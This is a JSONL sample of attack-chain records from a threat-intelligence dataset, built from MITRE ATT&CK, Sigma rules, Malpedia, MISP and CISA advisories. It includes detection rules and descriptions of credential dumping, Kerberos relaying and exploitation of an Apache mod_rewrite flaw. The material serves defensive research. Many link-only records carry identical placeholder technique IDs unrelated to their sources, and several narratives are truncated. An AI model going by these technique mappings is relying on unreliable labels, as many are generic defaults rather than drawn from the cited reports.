/
cyberknowledge
/
attack_chains
Обзор
Документация
Войти
/
cyberknowledge
/
attack_chains
Код
Запросы
0
Задачи
Вики
Пакеты
0
Релизы
0
Аналитика
master
samples/attack_chains_sample_100.jsonl
100 строк
184 KB
Codex Agent
Document Postgres+S3 storage model and refresh public dataset stats.
22 июл 2026, 13:25
22 июл 2026, 13:25
b8ae70b
Код
Авторство
О чём код?
{"chain_id": "db0db10144c9564abcf814f3213acc85", "source_id": "malpedia_family_reports", "external_id": "osx.oceanlotus", "title": "Malpedia — OceanLotus (APT32)", "description": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).", "steps": [{"order": 1, "label": "Technique T1071.001", "narrative": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).", "mitre_attack": [{"technique_id": "T1071.001"}]}, {"order": 2, "label": "Technique T1204.002", "narrative": "According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.\r\n\r\nThe OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).", "mitre_attack": [{"technique_id": "T1204.002"}]}], "provenance": {"url": "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "retrieved_at": "2026-07-13T12:25:36.537855+00:00", "license": "", "lang": "en"}} {"chain_id": "7740592da02b06f2131baa20be3ea72d", "source_id": "awesome_attack_attribution", "external_id": "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU", "title": "Tools associated with groups (partial)", "description": "Tools associated with groups (partial)", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "Tools associated with groups (partial)", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "Tools associated with groups (partial)", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "Tools associated with groups (partial)", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU", "retrieved_at": "2026-07-10T15:50:01.785921+00:00", "license": "", "lang": "en"}} {"chain_id": "03275c10767648014ce742f211025a70", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/cloud_google_com/blog_topics_threat-intelligence_disrupting-largest-residential-proxy-network/link.md", "title": "blog_topics_threat-intelligence_disrupting-largest-residential-proxy-network", "description": "blog_topics_threat-intelligence_disrupting-largest-residential-proxy-network", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://cloud.google.com/blog/topics/threat-intelligence/disrupting-largest-residential-proxy-network/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/cloud_google_com/blog_topics_threat-intelligence_disrupting-largest-residential-proxy-network/link.md", "retrieved_at": "2026-07-10T13:11:40.781862+00:00", "license": "", "lang": "en"}} {"chain_id": "beae9b71b9a1b28b4c9464de28a02d3d", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/bin_re/blog_the-dga-of-ranbyus/link.md", "title": "blog_the-dga-of-ranbyus", "description": "blog_the-dga-of-ranbyus", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://bin.re/blog/the-dga-of-ranbyus/)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://bin.re/blog/the-dga-of-ranbyus/)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://bin.re/blog/the-dga-of-ranbyus/)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/bin_re/blog_the-dga-of-ranbyus/link.md", "retrieved_at": "2026-07-10T12:21:12.319040+00:00", "license": "", "lang": "en"}} {"chain_id": "247d8f6abbede11e49a8e8074d1c2e42", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/anchorednarratives_substack_com/p_tracking-strongpity-with-yara/link.md", "title": "p_tracking-strongpity-with-yara", "description": "p_tracking-strongpity-with-yara", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/anchorednarratives_substack_com/p_tracking-strongpity-with-yara/link.md", "retrieved_at": "2026-07-10T12:18:26.072359+00:00", "license": "", "lang": "en"}} {"chain_id": "89e1cb63d63c59582dea61942d90fbb7", "source_id": "misp_galaxy_relations", "external_id": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "title": "Native API - T1106", "description": "Native API - T1106", "steps": [{"order": 1, "label": "Technique T1106", "narrative": "T1106 ['attack-Linux:execution', 'attack-macOS:execution', 'attack-Windows:execution'] ['Module: Module Load', 'Process: OS API Execution'] ['Linux', 'macOS', 'Windows'] ['https://attack.mitre.org/techniques/T1106', 'https://developer.apple.com/documentation/coreservices', 'https://developer.apple.com/documentation/foundation', 'https://developer.apple.com/library/archive/documentation/MacOSX/Conc", "mitre_attack": [{"technique_id": "T1106"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:40.831449+00:00", "license": "", "lang": "en"}, "actor": {"name": "Native API - T1106", "aliases": []}} {"chain_id": "409b5b2ad8d600a750d1ad1e3ea36b7d", "source_id": "huntress_blog", "external_id": "https://www.huntress.com/blog/data-exfiltration-threat-actor-infrastructure-exposed", "title": "Data Exfiltration and Threat Actor Infrastructure Exposed", "description": "Data Exfiltration and Threat Actor Infrastructure Exposed", "steps": [{"order": 1, "label": "Using Backup Utilities for Data Exfiltration", "narrative": "“Double extortion” attacks, often perpetrated by ransomware threat actors, include data exfiltration prior to file encryption. Huntress analysts have observed various means of data exfiltration, but recently observed the use of a legitimate backup application seen by others to be associated with a Noberus/ALPHV ransomware affiliate. Learn More", "mitre_attack": [{"technique_id": "T1041"}, {"technique_id": "T1486"}]}, {"order": 2, "label": "Exposing Data Exfil: LOLBins, TTPs, and Binaries…Oh, My!", "narrative": "Threat actors often steal data during the course of their attacks. This is particularly true for ransomware threat actors, who do it before deploying file encryption in order to engage in “double extortion” activities. This activity can be difficult to detect, particularly if it’s not dissimilar to legitimate actions taken by system administrators. Learn More", "mitre_attack": [{"technique_id": "T1041"}, {"technique_id": "T1486"}]}, {"order": 3, "label": "Can’t Touch This: Data Exfiltration via Finger", "narrative": "Threat actors frequently make use of native utilities during incidents. However, this blog post discusses a rarely-observed means of data exfiltration. Learn More", "mitre_attack": [{"technique_id": "T1041"}]}, {"order": 4, "label": "Akira, LimeWire, and the Sour Taste of Data Exfiltration", "narrative": "A recent investigation uncovered an Akira affiliate abusing a website owned by file-sharing app LimeWire for data exfiltration. Here's how the attack unfolded. Learn More", "mitre_attack": [{"technique_id": "T1041"}]}], "provenance": {"url": "https://www.huntress.com/blog/data-exfiltration-threat-actor-infrastructure-exposed", "retrieved_at": "2026-07-09T14:04:23.052712+00:00", "license": "", "lang": "en"}} {"chain_id": "1e2d630c01e9e0920d340b01aacd15aa", "source_id": "cisa_aa_catalog", "external_id": "ICSA-25-051-02", "title": "ABB FLXEON Controllers", "description": "ABB FLXEON Controllers", "steps": [{"order": 1, "label": "Reconnaissance", "narrative": "ABB FLXEON Controllers: ABB FLXEON Controllers\nAn update is available that resolves a privately reported vulnerability in the product versions listed as affected in this advisory.\n\nFLXEON devices are not intended to be inter", "mitre_attack": [{"technique_id": "T1592"}]}, {"order": 2, "label": "Initial Access", "narrative": "ABB FLXEON Controllers: ABB FLXEON Controllers\nAn update is available that resolves a privately reported vulnerability in the product versions listed as affected in this advisory.\n\nFLXEON devices are not intended to be inter", "mitre_attack": [{"technique_id": "T1190"}]}, {"order": 3, "label": "Execution", "narrative": "ABB FLXEON Controllers: ABB FLXEON Controllers\nAn update is available that resolves a privately reported vulnerability in the product versions listed as affected in this advisory.\n\nFLXEON devices are not intended to be inter", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 4, "label": "Persistence", "narrative": "ABB FLXEON Controllers: ABB FLXEON Controllers\nAn update is available that resolves a privately reported vulnerability in the product versions listed as affected in this advisory.\n\nFLXEON devices are not intended to be inter", "mitre_attack": [{"technique_id": "T1078"}]}, {"order": 5, "label": "Impact", "narrative": "ABB FLXEON Controllers: ABB FLXEON Controllers\nAn update is available that resolves a privately reported vulnerability in the product versions listed as affected in this advisory.\n\nFLXEON devices are not intended to be inter", "mitre_attack": [{"technique_id": "T1486"}]}], "provenance": {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-051-02", "retrieved_at": "2026-07-09T14:00:15.822872+00:00", "license": "public-domain", "lang": "en"}} {"chain_id": "a7252263d6774e5c69b0bc8999ca2699", "source_id": "sigma_attack_stage_tags", "external_id": "windows\\process_creation\\proc_creation_win_msxsl_remote_execution.yml", "title": "Remote XSL Execution Via Msxsl.EXE", "description": "Remote XSL Execution Via Msxsl.EXE", "steps": [{"order": 1, "label": "Remote XSL Execution Via Msxsl.EXE", "narrative": "Detects the execution of the \"msxsl\" binary with an \"http\" keyword in the command line. This might indicate a potential remote execution of XSL files.", "mitre_attack": [{"technique_id": "T1220"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_msxsl_remote_execution.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_msxsl_remote_execution.yml", "retrieved_at": "2026-07-10T11:38:23.654524+00:00", "license": "", "lang": "en"}} {"chain_id": "8dc39d558f1178c68b228d2360cadae7", "source_id": "awesome_attack_attribution", "external_id": "https://adsecurity.org/?p=1729", "title": "SOC - DCsync explained", "description": "SOC - DCsync explained", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "SOC - DCsync explained", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "SOC - DCsync explained", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "SOC - DCsync explained", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://adsecurity.org/?p=1729", "retrieved_at": "2026-07-10T15:50:01.816046+00:00", "license": "", "lang": "en"}} {"chain_id": "3e61d2b5132d24c3458935e5f906e1d6", "source_id": "awesome_attack_attribution", "external_id": "https://www.youtube.com/@Preludeorg/videos", "title": "Conferences channel - Preludeorg", "description": "Conferences channel - Preludeorg", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "Conferences channel - Preludeorg", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "Conferences channel - Preludeorg", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "Conferences channel - Preludeorg", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://www.youtube.com/@Preludeorg/videos", "retrieved_at": "2026-07-10T15:50:01.805088+00:00", "license": "", "lang": "en"}} {"chain_id": "79b41cc2def860a7c00cb20f16eaada5", "source_id": "crowdstrike_adversary", "external_id": "G0100", "title": "Inception", "description": "[Inception](https://attack.mitre.org/groups/G0100) … [Строка слишком длинная. Вы можете скачать файл] {"chain_id": "3faa28b2f1ebdaf9dd8862e1d864e7f9", "source_id": "mitre_car_analytics", "external_id": "CAR-2014-11-003.yaml", "title": "Debuggers for Accessibility Applications", "description": "Debuggers for Accessibility Applications", "steps": [{"order": 1, "label": "CAR T1546", "narrative": "---\ntitle: Debuggers for Accessibility Applications\nsubmission_date: 2014/11/21\ninformation_domain: Host\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - MITRE\nid: CAR-2014-11-003\ndescription: |\n The Windows Registry location `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options` allows for parameters to be set for applications durin", "mitre_attack": [{"technique_id": "T1546"}]}, {"order": 2, "label": "CAR T1546.008", "narrative": "---\ntitle: Debuggers for Accessibility Applications\nsubmission_date: 2014/11/21\ninformation_domain: Host\nplatforms:\n - Windows\nsubtypes:\n - Process\nanalytic_types:\n - TTP\ncontributors:\n - MITRE\nid: CAR-2014-11-003\ndescription: |\n The Windows Registry location `HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options` allows for parameters to be set for applications durin", "mitre_attack": [{"technique_id": "T1546.008"}]}], "provenance": {"url": "https://github.com/mitre-attack/car/blob/master/analytics/CAR-2014-11-003.yaml", "retrieved_at": "2026-07-10T11:38:45.739061+00:00", "license": "", "lang": "en"}} {"chain_id": "a6f41c801a18cd38ada55f47c2321f56", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/attack_mitre_org/groups_G0129/link.md", "title": "groups_G0129", "description": "groups_G0129", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://attack.mitre.org/groups/G0129)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://attack.mitre.org/groups/G0129)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://attack.mitre.org/groups/G0129)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/attack_mitre_org/groups_G0129/link.md", "retrieved_at": "2026-07-10T12:19:36.409095+00:00", "license": "", "lang": "en"}} {"chain_id": "6717fd9c86dc35e9d837c7a8134c0aa1", "source_id": "awesome_attack_attribution", "external_id": "https://www.joesandbox.com/analysispaged/0", "title": "joesandbox", "description": "joesandbox", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "joesandbox", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "joesandbox", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "joesandbox", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://www.joesandbox.com/analysispaged/0", "retrieved_at": "2026-07-10T15:50:01.791537+00:00", "license": "", "lang": "en"}} {"chain_id": "2163a861593ad0a6fd0a17c0c9e2d04e", "source_id": "misp_galaxy_relations", "external_id": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", "title": "Program Executions in Suspicious Folders", "description": "Program Executions in Suspicious Folders", "steps": [{"order": 1, "label": "Technique T1584", "narrative": "Florian Roth (Nextron Systems) 2018-01-23 ['Admin activity (especially in /tmp folders)', 'Crazy web applications'] lnx_auditd_susp_exe_folders.yml medium No established category linux ['Internal Research', 'https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml'] ['attack.t1587', 'attack.t1584', 'attack.resource-development']", "mitre_attack": [{"technique_id": "T1584"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}, {"order": 2, "label": "Technique T1587", "narrative": "Florian Roth (Nextron Systems) 2018-01-23 ['Admin activity (especially in /tmp folders)', 'Crazy web applications'] lnx_auditd_susp_exe_folders.yml medium No established category linux ['Internal Research', 'https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/syscall/lnx_auditd_susp_exe_folders.yml'] ['attack.t1587', 'attack.t1584', 'attack.resource-development']", "mitre_attack": [{"technique_id": "T1587"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.382021+00:00", "license": "", "lang": "en"}, "actor": {"name": "Program Executions in Suspicious Folders", "aliases": []}} {"chain_id": "fef74937052f072fd4fca934e6a139e2", "source_id": "sigma_attack_stage_tags", "external_id": "windows\\process_creation\\proc_creation_win_hktl_krbrelay_remote.yml", "title": "HackTool - RemoteKrbRelay Execution", "description": "HackTool - RemoteKrbRelay Execution", "steps": [{"order": 1, "label": "HackTool - RemoteKrbRelay Execution", "narrative": "Detects the use of RemoteKrbRelay, a Kerberos relaying tool via CommandLine flags and PE metadata.\n", "mitre_attack": [{"technique_id": "T1558.003"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_hktl_krbrelay_remote.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_hktl_krbrelay_remote.yml", "retrieved_at": "2026-07-10T11:38:23.226089+00:00", "license": "", "lang": "en"}} {"chain_id": "9cfdfe66ce1c867d8fc2ecbe62c2aeef", "source_id": "mordor_metadata", "external_id": "datasets\\atomic\\_metadata\\SDWIN-191027055035.yaml", "title": "SDWIN-191027055035", "description": "SDWIN-191027055035", "steps": [{"order": 1, "label": "Technique T1059", "narrative": "title: RDP TaskManager LSASS Dump\nid: SDWIN-191027055035\ncontributors:\n- Roberto Rodriguez @Cyb3rWard0g\ncreation_date: 2019/10/27\nmodification_date: 2020/09/21\nplatform:\n- Windows\ntype: atomic\ntags:\n - RDP Interactive\ndescription: This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.\nattack_mappings:\n - technique: T1003\n sub-technique", "mitre_attack": [{"technique_id": "T1059"}], "evidence_refs": [{"project": "threat_logs", "ref": "OTRF/Security-Datasets"}]}, {"order": 2, "label": "Technique T1003", "narrative": "title: RDP TaskManager LSASS Dump\nid: SDWIN-191027055035\ncontributors:\n- Roberto Rodriguez @Cyb3rWard0g\ncreation_date: 2019/10/27\nmodification_date: 2020/09/21\nplatform:\n- Windows\ntype: atomic\ntags:\n - RDP Interactive\ndescription: This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.\nattack_mappings:\n - technique: T1003\n sub-technique", "mitre_attack": [{"technique_id": "T1003"}], "evidence_refs": [{"project": "threat_logs", "ref": "OTRF/Security-Datasets"}]}, {"order": 3, "label": "Technique T1021", "narrative": "title: RDP TaskManager LSASS Dump\nid: SDWIN-191027055035\ncontributors:\n- Roberto Rodriguez @Cyb3rWard0g\ncreation_date: 2019/10/27\nmodification_date: 2020/09/21\nplatform:\n- Windows\ntype: atomic\ntags:\n - RDP Interactive\ndescription: This dataset represents adversaries using RDP and task manager interactively and dump the memory space of lsass.\nattack_mappings:\n - technique: T1003\n sub-technique", "mitre_attack": [{"technique_id": "T1021"}], "evidence_refs": [{"project": "threat_logs", "ref": "OTRF/Security-Datasets"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_mordor\\datasets\\atomic\\_metadata\\SDWIN-191027055035.yaml", "retrieved_at": "2026-07-10T15:16:58.239522+00:00", "license": "", "lang": "en"}} {"chain_id": "cc84d9d75c27d43ba69155aa3313079c", "source_id": "sigma_attack_stage_tags", "external_id": "cloud\\azure\\audit_logs\\azure_group_user_addition_ca_modification.yml", "title": "User Added To Group With CA Policy Modification Access", "description": "User Added To Group With CA Policy Modification Access", "steps": [{"order": 1, "label": "User Added To Group With CA Policy Modification Access", "narrative": "Monitor and alert on group membership additions of groups that have CA policy modification access", "mitre_attack": [{"technique_id": "T1548"}, {"technique_id": "T1556"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\cloud\\azure\\audit_logs\\azure_group_user_addition_ca_modification.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\cloud\\azure\\audit_logs\\azure_group_user_addition_ca_modification.yml", "retrieved_at": "2026-07-10T11:38:29.247540+00:00", "license": "", "lang": "en"}} {"chain_id": "6e78d4f811b72c4df77d4e5f068cff34", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/community_riskiq_com/article_8830dd9c/link.md", "title": "article_8830dd9c", "description": "article_8830dd9c", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://community.riskiq.com/article/8830dd9c)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://community.riskiq.com/article/8830dd9c)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://community.riskiq.com/article/8830dd9c)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/community_riskiq_com/article_8830dd9c/link.md", "retrieved_at": "2026-07-10T13:12:01.422304+00:00", "license": "", "lang": "en"}} {"chain_id": "3e51e476c44d33e5174e21431f66d9b8", "source_id": "aptnotes_stix", "external_id": "fefd7ff6b2b254bd2e05784b51758c5d90acc06f", "title": "Vulnerability, Malicious Code Appeared In The Mbr Destruction Function Using Hangul File", "description": "Vulnerability, Malicious Code Appeared In The Mbr Destruction Function Using Hangul File", "steps": [{"order": 1, "label": "Technique T1566", "narrative": "APT report by AhnLab (2014)", "mitre_attack": [{"technique_id": "T1566"}]}, {"order": 2, "label": "Technique T1059", "narrative": "APT report by AhnLab (2014)", "mitre_attack": [{"technique_id": "T1059"}]}, {"order": 3, "label": "Technique T1071", "narrative": "APT report by AhnLab (2014)", "mitre_attack": [{"technique_id": "T1071"}]}], "provenance": {"url": "https://app.box.com/s/q8gx5wedudaui491qn6i4d7dxsnmuyla", "retrieved_at": "2026-07-09T14:16:46.718056+00:00", "license": "", "lang": "en"}, "actor": {"name": "korea_power_plant_wiper"}} {"chain_id": "fa7758f0377456ebfa86046879424414", "source_id": "misp_galaxy_relations", "external_id": "46490193-1b22-4c29-bdd6-5bf63907216f", "title": "VBScript Payload Stored in Registry", "description": "VBScript Payload Stored in Registry", "steps": [{"order": 1, "label": "Technique T1547.001", "narrative": "Florian Roth (Nextron Systems) 2021-03-05 ['Unknown'] registry_set_vbs_payload_stored.yml high registry_set windows ['https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/', 'https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml'] ['attack.privilege-escalation', 'attack.persistence', 'a", "mitre_attack": [{"technique_id": "T1547.001"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/sigma-rules.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/sigma-rules.json", "retrieved_at": "2026-07-10T11:21:51.120383+00:00", "license": "", "lang": "en"}, "actor": {"name": "VBScript Payload Stored in Registry", "aliases": []}} {"chain_id": "543eb7f3e55d27e65b6f999d8a3a7d33", "source_id": "sigma_attack_stage_tags", "external_id": "windows\\process_creation\\proc_creation_win_office_onenote_embedded_script_execution.yml", "title": "OneNote.EXE Execution of Malicious Embedded Scripts", "description": "OneNote.EXE Execution of Malicious Embedded Scripts", "steps": [{"order": 1, "label": "OneNote.EXE Execution of Malicious Embedded Scripts", "narrative": "Detects the execution of malicious OneNote documents that contain embedded scripts.\nWhen a user clicks on a OneNote attachment and then on the malicious link inside the \".one\" file, it exports and executes the malicious embedded script from specific directories.\n", "mitre_attack": [{"technique_id": "T1218.001"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_office_onenote_embedded_script_execution.yml"}]}], "provenance": {"url": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_sft_soc_raw_external_sigma\\windows\\process_creation\\proc_creation_win_office_onenote_embedded_script_execution.yml", "retrieved_at": "2026-07-10T11:38:23.780898+00:00", "license": "", "lang": "en"}} {"chain_id": "f6b6f115bff8eaf5e9021729fc741458", "source_id": "redstack_vault_chains", "external_id": "f698d8e7-b32a-4393-8dee-4260ec2cfd35", "title": "f698d8e7-b32a-4393-8dee-4260ec2cfd35", "description": "Exploit improper output escaping in Apache HTTP Server's mod_rewrite module to map crafted URLs to unintended but permitted filesystem locations, enabling source code disclosure or code execution.", "steps": [{"order": 1, "label": "Exploit-Apache-mod_rewrite-Improper-Escaping", "narrative": "Exploit improper output escaping in Apache HTTP Server's mod_rewrite module to map crafted URLs to unintended but permitted filesystem locations, enabling source code disclosure or code execution.", "mitre_attack": []}], "provenance": {"url": "https://github.com/redstackio/redstack-vault/blob/main/attack-chains/Apache-mod_rewrite-Improper-Escaping-for-Unintended-Filesystem-Access-(CVE-2024-38475).md", "retrieved_at": "2026-07-10T14:11:21.569291+00:00", "license": "MIT", "lang": "en"}} {"chain_id": "13909eb80176cda9db4fb113eab16fb6", "source_id": "mthcht_threatintel_reports", "external_id": "Intel Reports/community_riskiq_com/article_56d50011/link.md", "title": "article_56d50011", "description": "article_56d50011", "steps": [{"order": 1, "label": "Technique T1595", "narrative": "[Link to the article](https://community.riskiq.com/article/56d50011)\n", "mitre_attack": [{"technique_id": "T1595"}]}, {"order": 2, "label": "Technique T1071", "narrative": "[Link to the article](https://community.riskiq.com/article/56d50011)\n", "mitre_attack": [{"technique_id": "T1071"}]}, {"order": 3, "label": "Technique T1059", "narrative": "[Link to the article](https://community.riskiq.com/article/56d50011)\n", "mitre_attack": [{"technique_id": "T1059"}]}], "provenance": {"url": "https://github.com/mthcht/ThreatIntel-Reports/tree/master/Intel Reports/community_riskiq_com/article_56d50011/link.md", "retrieved_at": "2026-07-10T13:11:59.644006+00:00", "license": "", "lang": "en"}} {"chain_id": "6005d88bb0b2e9e28723e98ee2de884c", "source_id": "misp_galaxy_relations", "external_id": "e30cc912-7ea1-4683-9219-543b86cbdec9", "title": "Fake Developer Accounts - MOB-T1045", "description": "Fake Developer Accounts - MOB-T1045", "steps": [{"order": 1, "label": "Technique T1045", "narrative": "MOB-T1045 ['mitre-mobile-attack:mobile-attack:app-delivery-via-authorized-app-store'] ['Android', 'iOS'] ['https://attack.mitre.org/mobile/index.php/Technique/MOB-T1045', 'https://jon.oberheide.org/files/summercon12-bouncer.pdf']", "mitre_attack": [{"technique_id": "T1045"}], "evidence_refs": [{"project": "github", "ref": "MISP/misp-galaxy/clusters/mitre-mobile-attack-attack-pattern.json"}]}], "provenance": {"url": "https://github.com/MISP/misp-galaxy/blob/main/clusters/mitre-mobile-attack-attack-pattern.json", "retrieved_at": "2026-07-10T11:21:45.437078+00:00", "license": "", "lang": "en"}, "actor": {"name": "Fake Developer Accounts - MOB-T1045", "aliases": []}} {"chain_id": "506e8377e1398c85224fb44c0546cae8", "source_id": "mitre_attack_stix_campaigns", "external_id": "campaign--7ab2f1a1-26af-4204-ad84-d640fde391da", "title": "Juicy Mix", "description": "Juicy Mix", "steps": [{"order": 1, "label": "Technique T1053.005", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1053.005"}], "evidence_refs": [{"project": "lora_soc", "ref": "C:\\Drachukov\\attack_chains\\data\\cache\\lora_soc\\lora_soc_external_raw_mitre_cti\\enterprise-attack.json"}]}, {"order": 2, "label": "Technique T1059.001", "narrative": "[Juicy Mix](https://attack.mitre.org/campaigns/C0044) was a campaign conducted by [OilRig](https://attack.mitre.org/groups/G0049) throughout 2022 that targeted Israeli organizations with the [Mango](https://attack.mitre.org/software/S1169) backdoor.(Citation: ESET OilRig Campaigns Sep 2023)", "mitre_attack": [{"technique_id": "T1059.001"}], "evidence_refs": [{"project": 